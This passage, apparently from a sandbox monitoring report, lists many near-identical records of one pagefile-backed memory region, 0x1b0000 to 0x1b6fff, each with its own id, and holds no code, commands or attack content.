"pagefile_0x00000000001b0000" filename = "" Region: id = 10279 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10280 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10281 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10282 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10283 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10284 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10285 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10333 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10334 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10335 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10336 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10337 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10338 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10339 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10340 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10341 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10342 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10343 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10344 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10345 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10346 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10347 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10348 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10349 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10350 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10351 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10352 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10353 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10354 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10355 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10356 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10357 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10358 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10359 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10360 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10361 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10362 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10363 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10364 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10365 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10366 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10367 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10368 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10369 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10370 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10371 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10372 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10373 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10374 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10375 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10376 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10377 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10378 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10379 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10380 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10429 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10430 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10431 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10432 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10433 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10434 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10435 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10436 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10437 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10438 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10439 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10440 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10441 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10442 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10443 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10444 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10445 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10446 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10447 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10448 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10449 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10450 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10451 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10452 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10453 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10454 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10455 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10456 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10457 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10458 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10459 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10460 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10461 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10462 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10463 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10464 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10465 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10519 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10520 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10521 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10522 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10523 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10524 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10525 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10526 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10527 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10528 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10529 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10530 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10531 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10532 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10533 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10534 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10535 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10536 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10537 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10538 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10539 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10540 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10541 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10542 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10543 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10544 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10545 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10546 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10547 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10548 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10549 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10550 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10551 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10552 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10553 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10554 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10555 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10556 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10557 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10558 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10559 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10560 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10561 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10562 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10563 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10564 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10565 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10566 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10567 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10616 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10617 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10618 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10619 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10620 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10621 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10622 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10623 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10624 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10625 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10626 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10627 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10628 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10629 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10630 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10631 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10632 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10633 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10634 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10635 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10636 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10637 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10638 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10639 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10640 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10641 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10642 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10643 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10644 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10645 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10646 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10647 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10648 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10649 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10650 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10651 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10652 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10653 start_va = 0x1b0000 end_va = 